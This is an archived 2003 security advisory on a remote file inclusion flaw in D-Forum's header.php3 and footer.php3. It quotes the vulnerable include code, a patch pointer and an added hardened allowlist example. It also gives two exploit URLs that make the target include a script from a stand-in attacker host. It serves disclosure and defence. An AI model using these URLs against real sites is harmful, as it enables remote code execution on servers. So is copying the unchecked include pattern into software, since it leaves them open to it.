Vulnwatch mailing list archives
D-Forum (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 16 Feb 2003 18:06:15 +0100
Information :
°°°°°°°°°°°°°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 -> 1.11
Problem : Include file

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/includes/header.php3 :
---------------------------
<?php
if ($my_header!="") {
    include ($my_header);
} else {
?>
...
--------------------------

/includes/footer.php3 :
---------------------------
...
if ($my_footer!="") {
    include ($my_footer);
} else {
?>
...
---------------------------

Exploits :
°°°°°°°°°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
with
http://[attacker]/script.txt

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .

More details :
°°°°°°°°°°°°°°
(in French)
http://www.frog-man.org/tutos/5holes8.txt

frog-m@n
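The two files above pass `$my_header` / `$my_footer` straight to `include`, and with register_globals enabled a request parameter can set those variables. As an added example (not D-Forum's code and not the patch referenced above), here is a hardened header include in current PHP; the directory, file names and `$config` array are hypothetical.

```php
<?php
// Added example, not D-Forum code or the phpsecure.info patch.
// The include target is chosen by key from a fixed allowlist, so no
// request-supplied string is ever used as a path or URL.

// Assumption: custom headers live in one directory; names are hypothetical.
const HEADER_DIR = __DIR__ . '/custom';
const ALLOWED_HEADERS = [
    'default' => 'header_default.php3',
    'compact' => 'header_compact.php3',
];

function resolve_header($key): ?string
{
    if (!is_string($key) || !array_key_exists($key, ALLOWED_HEADERS)) {
        return null;                  // unknown key, URL, path fragment, array...
    }
    $base = realpath(HEADER_DIR);
    $path = realpath(HEADER_DIR . '/' . ALLOWED_HEADERS[$key]);
    if ($base === false || $path === false) {
        return null;                  // directory or file missing
    }
    // Defence in depth: the resolved file must still sit under HEADER_DIR
    // (catches a symlink that points elsewhere).
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Hypothetical application config; never read this value from
// $_GET, $_POST, $_COOKIE or an uninitialised global.
$config = ['header' => 'default'];

$file = resolve_header($config['header'] ?? null);
if ($file !== null) {
    include $file;
} else {
    echo "<!-- built-in default header -->\n";
}

// Constructed inputs in the shape of the parameter values shown above:
// each one is rejected (null) because it is not an allowlist key.
foreach (['http://[attacker]/script.txt', '../header_default.php3', 'nosuchkey'] as $bad) {
    echo var_export($bad, true), ' => ', var_export(resolve_header($bad), true), "\n";
}
```

The same function covers `footer.php3` with a second allowlist. On the configuration side, register_globals was removed in PHP 5.4 and `allow_url_include` (added in PHP 5.2) defaults to Off and should stay off.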